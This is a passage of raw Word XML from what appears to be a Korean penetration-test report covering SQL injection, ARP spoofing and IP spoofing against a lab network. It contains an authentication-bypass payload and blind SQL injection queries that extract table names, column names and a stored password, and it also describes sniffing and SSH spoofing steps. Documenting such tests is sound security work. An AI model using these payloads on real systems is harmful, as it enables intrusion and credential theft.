          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">QL </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>njection [</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>인증우회,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>lind SQL Injection]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S</w:t>
      </w:r>
      <w:r w:rsidRPr="00731CFE">
        <w:t>QL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00731CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731CFE" w:rsidRDefault="00731CFE" w:rsidP="00731CFE">
      <w:pPr>
        <w:ind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QL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이란 데이터베이스를 구축하고 활용하기 위해 사용하는 언어로 데이터 정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작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어 기능에 대한 명령을 포함하고 있음,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격은 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 xml:space="preserve">와 연동된 웹 응용 프로그램에서 입력된 데이터의 유효성 검증을 하지 않는 보안 취약점을 이용한 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731CFE" w:rsidRDefault="00731CFE" w:rsidP="00731CFE">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:ind w:leftChars="0" w:left="112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에 의해 처리되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에 따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인증 우회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데이터 접근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 xml:space="preserve">수정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삭제 등의 공격을 할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731CFE" w:rsidRPr="00731CFE" w:rsidRDefault="00731CFE" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00731CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>모의 해킹 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B76C3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인증 우회 공격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EB586BF" wp14:editId="64FF1085">
            <wp:extent cx="4472940" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="57" name="그림 57" descr="https://lh6.googleusercontent.com/jTcDKUXpxDeBrFCbCsdTcIpnfzI0ltb5RfP1Qq7tJHmg6yyodcKO1HUH7pV93WvDp-u7V9HINGyInGmumL89IhKgSfSWJv8DWJC01QqYg4-zGDWoXIl_Lo_R4e6PmHgulJHWY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jTcDKUXpxDeBrFCbCsdTcIpnfzI0ltb5RfP1Qq7tJHmg6yyodcKO1HUH7pV93WvDp-u7V9HINGyInGmumL89IhKgSfSWJv8DWJC01QqYg4-zGDWoXIl_Lo_R4e6PmHgulJHWYrmc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/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">‘ or ‘1’=’1’# </w:t>
      </w:r>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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이용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다른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인증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우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공격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패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58FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>단</w:t>
      </w:r>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,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DB </w:t>
      </w:r>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상에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SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>쿼리를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실행했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때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가장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상위에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위치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의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pw</w:t>
      </w:r>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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같은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값을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비밀번호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입력하는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경우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해당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레코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계정으로</w:t>
      </w:r>
      <w:r w:rsidRPr="007958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58FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>접속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가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007958FD" w:rsidRPr="007958FD" w:rsidRDefault="007958FD" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lind SQL Injection</w:t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C45D4B" wp14:editId="063BB6FC">
            <wp:extent cx="2484120" cy="342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8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17" cy="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399670" wp14:editId="704D1848">
            <wp:extent cx="2545080" cy="315595"/>
            <wp:effectExtent l="0" t="0" r="762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-08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62" cy="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785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192DFF0" wp14:editId="7AA5A378">
            <wp:extent cx="2505075" cy="69440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8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0" cy="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64806F" wp14:editId="359FC577">
            <wp:extent cx="2545080" cy="645795"/>
            <wp:effectExtent l="0" t="0" r="762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-086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86" cy="6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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection Vector </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007958FD" w:rsidRDefault="007958FD" w:rsidP="007958FD">
      <w:pPr>
        <w:ind w:left="804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02B689CB" wp14:editId="2FD0E439">
            <wp:extent cx="2476500" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62" name="그림 62" descr="https://lh3.googleusercontent.com/QGQHsAk9jAwVGvgQs-npQvwdYADd_QmJ0KQmD1e0NVvVgwshsz8x1mo0NKeqqWF78O_zH-u_gRKZshZcz6FHChfHaEpESr2qfr-EvyLo_eysyDHLXKB7iobeFu_0J7H3JvJ58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QGQHsAk9jAwVGvgQs-npQvwdYADd_QmJ0KQmD1e0NVvVgwshsz8x1mo0NKeqqWF78O_zH-u_gRKZshZcz6FHChfHaEpESr2qfr-EvyLo_eysyDHLXKB7iobeFu_0J7H3JvJ58DDO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1FBB103" wp14:editId="6FC28CBD">
            <wp:extent cx="2529840" cy="655320"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="63" name="그림 63" descr="https://lh6.googleusercontent.com/TsMy-f9I2NpEArm3rZv_GnfLnbUR_QMWFUcGZStAlriivoGKzCX3zLlFZW6Dq8mikZPsYtVAxk8V9nmpRDRWaOyQzT6HRKlfOTy0LheRqcO8yR8YY-AtShAcTdL3VU-Qn2H7i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6.googleusercontent.com/TsMy-f9I2NpEArm3rZv_GnfLnbUR_QMWFUcGZStAlriivoGKzCX3zLlFZW6Dq8mikZPsYtVAxk8V9nmpRDRWaOyQzT6HRKlfOTy0LheRqcO8yR8YY-AtShAcTdL3VU-Qn2H7iOk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FD" w:rsidRPr="001A2D88" w:rsidRDefault="007958FD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B</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lind SQL Injection </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격을 통해 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>의 길이와 이름을 확인할 수 있음</w:t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length((select table_name from (select table_name from information_schema.tables where table_schema=’SW_db’ and table_type=’base table’ order by table_name limit 1) as vtable order by table_name desc limit 1))=5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substr((select table_name from (select table_name from information_schema.tables where table_schema='SW_db' and table_type='base table' order by table_name limit 1) as vtable order by table_name desc limit 1), 1, 1)=char(0x42)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select table_name from (select table_name from information_schema.tables where table_schema=’SW_db’ and table_type=’base table’ order by table_name limit 1) as vtable order by table_name desc limit 1)=”board”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length((select column_name from (select column_name from information_schema.columns where table_name='board' order by column_name limit 1) as vtable order by column_name desc limit 1))=7%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007958FD" w:rsidRPr="007958FD" w:rsidRDefault="007958FD" w:rsidP="007958FD">
      <w:pPr>
        <w:ind w:left="800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and substr((select column_name from (select column_name from information_schema.columns where table_name='greet' order by column_name limit 1) as vtable order by column_name desc limit 1),1,1)=char(0x43)%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007958FD" w:rsidRDefault="007958FD" w:rsidP="007958FD">
      <w:pPr>
        <w:ind w:left="785"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(select column_name from (select column_name from information_schema.columns where table_name='board'\ order by column_name limit 1) as vtable order by column_name desc limit 1)=”content”%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007958FD" w:rsidRPr="007958FD" w:rsidRDefault="007958FD" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>쿼리 문을 이용해 T</w:t>
      </w:r>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>able, Column</w:t>
      </w:r>
      <w:r w:rsidRPr="007958FD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 이름을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A4AF2F" wp14:editId="53E15931">
            <wp:extent cx="5166360" cy="30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-09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4E8F00A" wp14:editId="174D6D74">
            <wp:extent cx="5158740" cy="28956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-099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554722" wp14:editId="6D96957A">
            <wp:extent cx="5143500" cy="281940"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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-09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A6071B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A2D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">가 가지고 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="001A2D88">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 길이 및 내용 확인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3A7FF85" wp14:editId="0F0281DD">
            <wp:extent cx="5143500" cy="297180"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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-10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(select pw from (select id,pw from member order by id limit 1) as vtable order by id desc limit 1)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(select pw from (select id,pw from member order by id limit 1) as vtable order by id desc limit 1), 1, 1)=char(0x42)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lastRenderedPageBreak/>
        <w:t>and (select pass from (select id,pw from member order by id limit 1) as vtable order by id desc limit 1)=”hacker”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length(select pw from member where id =”hacker”)=6%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007958FD" w:rsidRPr="0040771B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substr(select pw from member where id =”hacker”), 1, 1)=char(0x42)%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007958FD" w:rsidRDefault="007958FD" w:rsidP="007958FD">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and (select pw from member where id =”hacker”)=”hacker”%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007958FD" w:rsidRPr="0072175F" w:rsidRDefault="007958FD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>비밀번호의 길이 및 내용 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jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A6071B" w:rsidRDefault="00A60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5"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>네트워크 보안</w:t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72175F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RP Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731CFE" w:rsidRP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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00731CFE">
        <w:t>RP Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00731CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731CFE" w:rsidRPr="00731CFE" w:rsidRDefault="00731CFE" w:rsidP="00731CFE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 w:rsidRPr="00731CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">통신하는 두 대상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를 공격자 자신의 </w:t>
      </w:r>
      <w:r w:rsidRPr="00731CFE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00731CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">주소로 바꿔 중간에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="00731CFE">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00731CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 가로채는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731CFE" w:rsidRDefault="00731CFE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731CFE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>피해 범위</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00731CFE" w:rsidRPr="00A46F6C" w:rsidRDefault="00A46F6C" w:rsidP="00731C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A46F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RP Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격이 성공하게 되면 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MITM </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">즉 중간자 상태가 되어 두 공격 대상이 서로 통신하는 내용을 볼 수 있고 그 정보를 다시 목적지로 보내거나 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F6C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46F6C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 일부 변조하여 보낼 수도 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46F6C" w:rsidRPr="00731CF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191E730" wp14:editId="255EDC47">
            <wp:extent cx="2636520" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="64" name="그림 64" descr="https://lh3.googleusercontent.com/mmlQ9e4Zpmvq7gn_qPaiO1IeAOyjMZRjlcP8Ncxfrut7kRsIfoIVnFXVmENe7zaD4ESu5zOwbUQ_Po_Zz5fmiNyGCnnW0lLhxIQD6ZA9cX29AxcpoaHFJMCTT31wQDfgZsci4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mmlQ9e4Zpmvq7gn_qPaiO1IeAOyjMZRjlcP8Ncxfrut7kRsIfoIVnFXVmENe7zaD4ESu5zOwbUQ_Po_Zz5fmiNyGCnnW0lLhxIQD6ZA9cX29AxcpoaHFJMCTT31wQDfgZsci4cAM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983CCA1" wp14:editId="704E02B2">
            <wp:extent cx="2545080" cy="1958340"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="66" name="그림 66" descr="https://lh5.googleusercontent.com/b6HC5XTWIwxWknLCngUFSQX5y84z1PmQ87nBjcgnXN-fH_OiNhzam4H28xZXcCW5nXUpvB34kgw-sB6eJBLYbUYTbJOBh3l7mdv1OMsOHLRs9lvWJXuhoKjFn2tlHkVpDrYTTh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b6HC5XTWIwxWknLCngUFSQX5y84z1PmQ87nBjcgnXN-fH_OiNhzam4H28xZXcCW5nXUpvB34kgw-sB6eJBLYbUYTbJOBh3l7mdv1OMsOHLRs9lvWJXuhoKjFn2tlHkVpDrYTThGU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네트워크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침입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Gateway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이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이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관리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[10.10.20.254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속</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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뒤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공격대상</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>가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원활하게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통신할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수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있도록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>orwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>해주고</w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sniffing </w:t>
      </w:r>
      <w:r w:rsidRPr="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>시작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44C43B2" wp14:editId="4CCDD0FD">
            <wp:extent cx="3558540" cy="1903614"/>
            <wp:effectExtent l="0" t="0" r="381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공격대상이 게이트웨이와 패킷을 주고 받음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66" cy="19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21CA0543" wp14:editId="5E388D77">
            <wp:extent cx="3599180" cy="2144684"/>
            <wp:effectExtent l="0" t="0" r="127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공격자의 PC에 공격대상과 게이트웨이가 서로 통신하는 것을 확인할 수 있음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4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루어졌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하기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ateway Ping test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서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ing test</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>하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niff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하는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것을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확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46F6C" w:rsidRDefault="00A46F6C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0072175F" w:rsidRPr="00A46F6C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9321F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="009321F3">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>P Spoofing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P Spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="004D52EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이란</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46F6C" w:rsidRDefault="00A46F6C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공격자가 자신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를 악용하고자 하는 대상의 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주소로 변조하여 공격하는 </w:t>
      </w:r>
      <w:r w:rsidR="003C3D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>방법</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46F6C" w:rsidRPr="004D52EE" w:rsidRDefault="00A46F6C" w:rsidP="00CD0B2D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A46F6C" w:rsidRDefault="004D52EE" w:rsidP="00A46F6C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만약 공격 대상P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가 서버와 신뢰관계라면 서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데이터에 접근해 정보를 갈취하거나 중요 데이터들을 갈취할 수 있음 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 해킹 결과</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0072175F" w:rsidRP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0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923DE0D" wp14:editId="100A515F">
            <wp:extent cx="3599815" cy="1737360"/>
            <wp:effectExtent l="0" t="0" r="63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-1. 경영기획부 PC에서 DNS서버에 SSH 접속 시도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8" cy="1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2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47832EBD" wp14:editId="0EA4D58A">
            <wp:extent cx="3599180" cy="1516380"/>
            <wp:effectExtent l="0" t="0" r="127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-2. 경영기획부 PC에서 DNS서버에 SSH 접속 성공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70" cy="15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hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격에 앞서 경영관리부 </w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidRPr="0072175F">
        <w:rPr>
